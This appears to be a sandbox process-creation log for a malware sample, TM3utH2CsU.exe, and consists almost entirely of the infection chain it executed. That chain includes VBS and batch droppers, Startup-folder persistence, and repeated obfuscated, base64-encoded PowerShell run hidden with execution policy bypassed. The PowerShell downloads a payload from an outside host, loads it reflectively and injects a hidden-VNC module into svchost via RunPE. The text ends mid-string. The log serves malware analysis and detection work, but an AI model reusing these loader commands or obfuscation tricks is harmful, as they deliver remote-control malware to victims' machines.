Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKy